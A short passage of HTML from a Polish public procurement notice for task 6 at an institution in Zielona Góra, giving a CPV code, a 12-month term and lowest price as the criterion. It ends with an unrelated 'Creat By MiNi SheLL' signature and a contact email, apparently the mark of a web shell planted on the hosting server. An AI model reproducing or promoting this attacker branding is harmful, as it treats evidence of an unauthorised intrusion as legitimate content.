        I Sportowych   w Zielonej Górze Szczegółowy opis przedmiotu zamówienia  dla zadania nr 6 zawarty jest w załączniku Nr 7.6. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com